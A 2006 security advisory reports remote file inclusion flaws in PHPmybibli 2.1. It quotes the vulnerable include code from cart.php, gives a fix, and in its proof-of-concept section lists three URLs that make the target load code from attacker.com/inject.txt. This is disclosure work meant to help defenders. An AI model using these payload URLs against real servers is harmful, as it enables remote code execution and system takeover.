[ECHO_ADV_55$2006]Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability

2006-10-19T00:00:00
ID SECURITYVULNS:DOC:14736
Type securityvulns
Reporter Securityvulns
Modified 2006-10-19T00:00:00

Description

ECHO_ADV_55$2006

------------------------------------------------------------------------

[ECHO_ADV_55$2006]Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability


Author : Dedi Dwianto a.k.a the_day Date Found : October, 17th 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv55-theday-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote



Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHPmybibli version : <=2.1 URL : http://www.pizz.net/

------------------------------------------------------------------------

Vulnerability: ~~~~~~~~~~~~~~

I found vulnerability script cart.php --------------------------cart.php-------------------------------------- - .... <?

include_once("$include_path/cart.inc.php"); include_once("$include_path/templates/cart.tpl.php"); include_once("$include_path/isbn.inc.php"); include_once("$include_path/expl_info.inc.php"); include_once("$include_path/bull_info.inc.php"); include_once("$include_path/notice_authors.inc.php"); include_once("$include_path/notice_categories.inc.php"); include_once("$include_path/explnum.inc.php"); include_once("$class_path/cart.class.php"); include_once("$class_path/caddie.class.php"); include_once("$class_path/author.class.php"); include_once("$class_path/collection.class.php"); include_once("$class_path/subcollection.class.php"); include_once("$class_path/mono_display.class.php"); include_once("$class_path/serie.class.php"); include_once("$class_path/serial_display.class.php"); include_once("$class_path/serials.class.php"); include_once("$class_path/editor.class.php"); require_once("$class_path/emprunteur.class.php"); require_once("$javascript_path/misc.inc.php"); ...


Input passed to the "$include_path" parameter in cart.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Also affected files on Files:

edit.php circ.php index.php select.php etc..

Proof Of Concept: ~~~~~~~~~~~~~~~

http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker .com/inject.txt? http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://atta cker.com/inject.txt? http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacke r.com/inject.txt?

Solution: ~~~~~~~

  • Sanitize variable $class_path,$javascript_path,$include_path on affected files.
  • Turn off register_globals

------------------------------------------------------------------------

Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy My Brain ~ az001,bomm_3x,matdhule,angelia ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #aikmel - #e-c-h-o @irc.dal.net



Contact: ~~~~ EcHo Research & Development Center the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------